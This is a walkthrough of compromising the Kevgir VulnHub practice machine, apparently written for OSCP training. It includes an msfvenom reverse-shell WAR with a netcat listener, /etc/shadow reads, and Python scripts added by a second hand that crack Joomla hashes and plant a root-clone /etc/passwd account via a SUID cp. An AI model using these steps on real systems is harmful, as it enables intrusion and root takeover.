The machine

This machine is one of the machines from the OSCP preparation guide I received from one of my teachers. It is the next one on the list and can be downloaded from: vulnhub

The challenge

The challenge or goal of the machine lists the following:

Kevgir has been designed by the canyoupwnme team for training, hacking practice and exploiting. Kevgir has lots of vulnerable services and web applications for testing. We are happy to announce that.

https://www.vulnhub.com/entry/kevgir-1,137/

Walk-through

The walk-through is divided into a few sections following the standard penetration testing process: Information gathering –> Exploitation –> Post exploitation. It could be split into more steps, but for simplicity we stick to these three.

Information gathering

To start off, we find the IP address of the machine with nmap, since netdiscover takes a while on my VMware setup. The command is sudo nmap -sn 192.168.0.0/24 (a ping sweep only, no port scan). The vulnerable machine has the IP 192.168.0.138.

Next we scan the machine for open ports with nmap. We do two scans: sudo nmap -sV -sC 192.168.0.138 -oA nmap (nmap's default top 1000 ports) and sudo nmap -sV -sC -p- 192.168.0.138 -oA fullnmap (all 65535 TCP ports). The parameters:
-sV service and version detection,
-sC run the default NSE script set,
-p- scan all TCP ports instead of the default top 1000,
-oA save the output in all three formats (normal, grepable and XML) under the given base name.

The nmap results:

# Nmap 7.80 scan initiated Tue Feb 18 13:46:13 2020 as: nmap -sV -sC -oA nmap 192.168.0.138
Nmap scan report for 192.168.0.138
Host is up (0.000068s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE     VERSION
25/tcp   open  ftp         vsftpd 3.0.2
|_smtp-commands: SMTP: EHLO 530 Please login with USER and PASS.\x0D
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Kevgir VM
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      32979/udp6  mountd
|   100005  1,2,3      37206/tcp   mountd
|   100005  1,2,3      47667/tcp6  mountd
|   100005  1,2,3      48358/udp   mountd
|   100021  1,3,4      37042/tcp6  nlockmgr
|   100021  1,3,4      37283/udp   nlockmgr
|   100021  1,3,4      37795/udp6  nlockmgr
|   100021  1,3,4      56540/tcp   nlockmgr
|   100024  1          44928/udp   status
|   100024  1          52040/tcp   status
|   100024  1          52398/tcp6  status
|   100024  1          53714/udp6  status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
1322/tcp open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 17:32:b4:85:06:20:b6:90:5b:75:1c:6e:fe:0f:f8:e2 (DSA)
|   2048 53:49:03:32:86:0b:15:b8:a5:f1:2b:8e:75:1b:5a:06 (RSA)
|   256 3b:03:cd:29:7b:5e:9f:3b:62:79:ed:dc:82:c7:48:8a (ECDSA)
|_  256 11:99:87:52:15:c8:ae:96:64:73:d6:49:8c:d7:d7:9f (ED25519)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
8081/tcp open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Joomla! 1.5 - Open Source Content Management
| http-robots.txt: 14 disallowed entries 
| /administrator/ /cache/ /components/ /images/ 
| /includes/ /installation/ /language/ /libraries/ /media/ 
|_/modules/ /plugins/ /templates/ /tmp/ /xmlrpc/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to the Frontpage
9000/tcp open  http        Jetty winstone-2.9
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(winstone-2.9)
|_http-title: Dashboard [Jenkins]
MAC Address: 00:0C:29:A2:8E:AF (VMware)
Service Info: Host: CANYOUPWNME; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 19m59s, deviation: 1h09m16s, median: 59m58s
|_nbstat: NetBIOS name: CANYOUPWNME, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   Computer name: canyoupwnme
|   NetBIOS computer name: CANYOUPWNME\x00
|   Domain name: 
|   FQDN: canyoupwnme
|_  System time: 2020-02-18T21:46:24+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-02-18T19:46:24
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 18 13:46:29 2020 -- 1 IP address (1 host up) scanned in 16.11 seconds

Well, that is a lot of ports. In short we have:
– 25 vsftpd 3.0.2 (FTP on the SMTP port; the 530 line in the banner is the server asking for the USER and PASS commands)
– 80 Apache httpd 2.4.7
– 111 rpcbind, which advertises NFS and mountd, so there may be shares we can mount
– 139, 445 Samba (netbios-ssn)
– 1322 OpenSSH 6.6.1p1
– 2049 NFS
– 8080 Apache Tomcat (nmap flags PUT and DELETE as allowed methods)
– 8081 Apache httpd with Joomla! 1.5
– 9000 Jetty with a Jenkins dashboard

We start with the FTP service, since there may be files with more information. The "530 Please login with USER and PASS" banner is not a username: USER and PASS are the FTP commands the server expects before it does anything, which is what you type when talking to it over telnet. Anonymous login is refused as well, so without credentials this is a dead end for now. Well, I learned something, I guess :p

On port 80 we get a pretty empty web server/web page. To be sure, we run nikto to look for possible vulnerabilities and dirb to brute-force directories: nikto -host http://192.168.0.138 -output nikto.txt and dirb http://192.168.0.138 -o dirb.txt. Let's have a look at the results:

We found a /phpmyadmin/ directory. We tried some basic credentials but couldn't log in; every attempt returned "#1045 Cannot log in to the MySQL server". MySQL error 1045 is "access denied", i.e. the user/password combination was rejected by the database itself, so either the credentials are wrong or the account does not exist; it does not by itself mean the server is down. No problem, not going to dive too deep into this. There is a lot more to explore!

Let's look at port 111, since there is a lot more behind rpcbind here than on other machines; I finally get to test this a bit. showmount -e 192.168.0.138 shows that /backup is exported. With mkdir /tmp/backupmount && sudo mount -t nfs 192.168.0.138:/backup /tmp/backupmount we mount it: -t sets the filesystem type to nfs, 192.168.0.138:/backup is the export we want, and /tmp/backupmount is the local mount point (it has to exist first, and mount needs root). Worth checking while it is mounted: whether the share is writable and, once you have a shell on the box, /etc/exports for no_root_squash, since a writable export with root not squashed lets you drop a root-owned SUID binary onto the target from your own machine. In the directory is a file named backup.tar.bz2.zip, which seems to be compressed a couple of times.

I tried unzipping the file, but it is password protected and some basic passwords did not work. We may find passwords later; I don't feel like brute-forcing it at the moment (fcrackzip, or zip2john followed by john, would be the tools for that).

There are other web services running; Tomcat should be on port 8080. Let's run dirb and nikto again, as we did on port 80. These are the results:

We found a couple of manager directories. All of them are password protected, but I managed to log in with tomcat:tomcat on /manager, /host-manager and /manager/status. This is a good start. Let's find a possible exploit!

Exploitation

To exploit Tomcat I found several Metasploit modules that abuse the /manager deployer or upload. I'm not interested in using Metasploit at the moment,

so let's google a way to exploit it by hand, since the manager lets us deploy a directory, an XML context file or a WAR file.

This guide shows the Metasploit way, but also how to generate a WAR file with msfvenom. No idea this was possible, awesome! Let's do it: msfvenom -p java/shell_reverse_tcp lhost=192.168.0.129 lport=1234 -f war -o ~/kevgir/exploit.war. Then we upload the file in the "WAR file to deploy" section of the manager, start our listener with nc -lvp 1234 and open the /exploit application from the manager's application list (the WAR is deployed under its file name, and the JSP inside connects back to the listener as soon as it is requested). And we got a shell as the tomcat user!

Privilege escalation

I'm not going to write down everything I try during privilege escalation, but if I find something that doesn't work I will note it. A good guide for finding privilege escalation vectors is this one from g0tmi1k.

I found a privilege escalation through a kernel exploit, but that is normally not the intended way on a vulnerable machine, so to learn more we look for something else. It should work, though, since the box runs an old Ubuntu version and kernel.

I got a proper TTY shell with the following command: python -c 'import pty; pty.spawn("/bin/bash")'

vsftpd, smbd and rpcbind are running as root (ps aux | grep root).

In /var/www/html/ we found the file configuration.php, which contains the database credentials and a server secret. In the database we found the administrator password hash for Joomla:

hash-identifier tells us it is an MD5 hash with a salt; Joomla 1.5 stores md5(password + salt) followed by a colon and the salt. Online lookups found nothing, as expected with a salt. Tried cracking it with hashcat and rockyou.txt, but no luck. I was brute-forcing it, but it ran for a bit and I had no luck.
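What that hash looks like and how a candidate is checked against it, as an added example that is not from the post (the entry below is constructed here from a known password and a made-up salt, not the VM's real administrator row): Joomla 1.5 stores md5(password + salt) followed by a colon and a 32-character alphanumeric salt, which is what hashcat cracks as mode 11 ("Joomla < 2.5.18") with hash:salt input. The same function also produces a replacement hash, which is the other option when you already hold the database credentials from configuration.php: UPDATE the administrator row in jos_users instead of cracking it. Function names are mine.

```python
"""Joomla 1.5 password hashes: md5(plaintext + salt) + ':' + salt.
Added example, not from the post; SAMPLE_* below are constructed here."""
import hashlib
import secrets
import string
from typing import Iterable, Optional


def joomla15_hash(password: str, salt: str) -> str:
    """Hash the way Joomla 1.5 (and < 2.5.18) does, with the ':salt' suffix."""
    return hashlib.md5((password + salt).encode()).hexdigest() + ":" + salt


def new_salt(length: int = 32) -> str:
    """Joomla uses a 32-character alphanumeric salt."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def split_entry(stored: str):
    """Split 'digest:salt' and reject anything that is not that shape."""
    digest, sep, salt = stored.partition(":")
    if sep != ":" or len(digest) != 32 or not salt:
        raise ValueError("not a Joomla md5:salt entry")
    return digest.lower(), salt


def check(stored: str, candidate: str) -> bool:
    """True when candidate is the password behind the stored entry."""
    digest, salt = split_entry(stored)
    return hashlib.md5((candidate + salt).encode()).hexdigest() == digest


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack; the same work hashcat -m 11 does."""
    digest, salt = split_entry(stored)
    for word in wordlist:
        word = word.rstrip("\r\n")          # wordlist files carry newlines
        if hashlib.md5((word + salt).encode()).hexdigest() == digest:
            return word
    return None


# Constructed sample: a known password hashed with a fixed salt, so the
# functions can be exercised without the VM's real jos_users row.
SAMPLE_SALT = "aK3mQ9xL0pT7vB2nR5sH8yZ1cW4dF6gJ"
SAMPLE_ENTRY = joomla15_hash("canyoupwnme", SAMPLE_SALT)

if __name__ == "__main__":
    print(SAMPLE_ENTRY)
    print(crack(SAMPLE_ENTRY, ["123456", "admin", "canyoupwnme"]))
    # Replacement value for:
    #   UPDATE jos_users SET password='<this>' WHERE username='admin';
    print(joomla15_hash("newpass", new_salt()))
```

Feeding rockyou.txt to crack() with open("rockyou.txt", errors="ignore") is slow in pure Python but correct; for anything beyond a few million candidates use hashcat -m 11 on the hash:salt string exactly as it sits in the database.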

SUID bits

With the command find /bin -perm -4000 (the usual form is find / -perm -4000 -type f 2>/dev/null, which covers the whole filesystem) I found the SUID bit set on cp. So we can copy any file as root? I copied /etc/shadow to /tmp/shadow to check whether it worked, and we could read it:

Interesting. Since cp runs as root, I think we can also replace /etc/passwd. To exploit this we have to do the following:
Generate a hash for a password with openssl passwd foo, where the password is foo. The hash is 7kTk8t7eAN5xQ.
Then we cat /etc/passwd and copy the root entry: root:x:0:0:root:/root:/bin/bash
Then we edit this entry to use another username but the same UID and GID, so we can log in with it, and we replace the x with the hash. So we get: roott:7kTk8t7eAN5xQ:0:0:root:/root:/bin/bash. But we cannot simply echo this line into the file, since the permissions are not right (I should have checked that before doing all this): 4 -rw-r--r-- 1 root tomcat7 1446 Feb 18 23:52 passwd, i.e. owned by root and only writable by root.

I worked around this by writing the contents to a new file named passwd in a directory I own, appending the line roott:7kTk8t7eAN5xQ:0:0:root:/root:/bin/bash to /tmp/test/passwd, and then copying /tmp/test/passwd over /etc/passwd with the SUID cp. Because the hash sits directly in the password field (no x), no shadow entry is needed, and we can switch to the new account with su roott and the password foo.
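The whole detour as a script, added here as an example (not from the post): it verifies that cp really is SUID root, builds the modified passwd in a scratch directory we own (the step the post needed because the copy could not be edited in place), keeps a backup of the original, and lets the SUID cp do the only privileged write. Assumptions: cp lives at /bin/cp, the hash is the one from openssl passwd (7kTk8t7eAN5xQ for foo, as above), and the account name roott; the helper names are mine.

```python
"""Second UID-0 account via a SUID-root cp. Added example, not from the post.
Assumes cp is SUID root (checked), /etc/passwd is world-readable (it is),
and a crypt(3) hash such as 7kTk8t7eAN5xQ ('foo') from `openssl passwd`."""
import os
import shutil
import stat
import subprocess
import tempfile


def is_suid_root(path: str) -> bool:
    """True when the file is owned by root and carries the setuid bit."""
    st = os.stat(path)
    return bool(st.st_mode & stat.S_ISUID) and st.st_uid == 0


def passwd_entry(user: str, crypt_hash: str, shell: str = "/bin/bash") -> str:
    """Root clone line: UID 0 / GID 0, hash in the password field instead of x."""
    for field in (user, crypt_hash, shell):
        if ":" in field or "\n" in field:
            raise ValueError("illegal character in passwd field")
    return f"{user}:{crypt_hash}:0:0:root:/root:{shell}"


def append_entry(passwd_text: str, entry: str) -> str:
    """Return passwd_text with entry appended; refuse an existing user name."""
    user = entry.split(":", 1)[0]
    existing = {line.split(":", 1)[0] for line in passwd_text.splitlines() if line}
    if user in existing:
        raise ValueError(f"user {user} already exists")
    if passwd_text and not passwd_text.endswith("\n"):
        passwd_text += "\n"
    return passwd_text + entry + "\n"


def install(user: str, crypt_hash: str, cp: str = "/bin/cp",
            passwd: str = "/etc/passwd") -> str:
    """Stage the new passwd in a directory we own, then let the SUID cp
    overwrite the real file. Returns the path of a backup of the original."""
    if not is_suid_root(cp):
        raise RuntimeError(f"{cp} is not SUID root")
    with open(passwd) as f:
        current = f.read()
    scratch = tempfile.mkdtemp(prefix="pw-")          # the post's /tmp/test
    backup = shutil.copy(passwd, os.path.join(scratch, "passwd.bak"))
    staged = os.path.join(scratch, "passwd")
    with open(staged, "w") as f:
        f.write(append_entry(current, passwd_entry(user, crypt_hash)))
    # cp opens the existing /etc/passwd for writing as euid 0: the owner and
    # mode of the destination stay root:root 0644, only the content changes.
    subprocess.run([cp, staged, passwd], check=True)
    return backup


if __name__ == "__main__":
    print("backup at", install("roott", "7kTk8t7eAN5xQ"))
    print("now run: su roott   (password: foo)")
```

Restoring is the same trick in reverse (cp the backup over /etc/passwd with the SUID binary), which is worth doing on a shared lab box once the flag is in hand.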

Flag
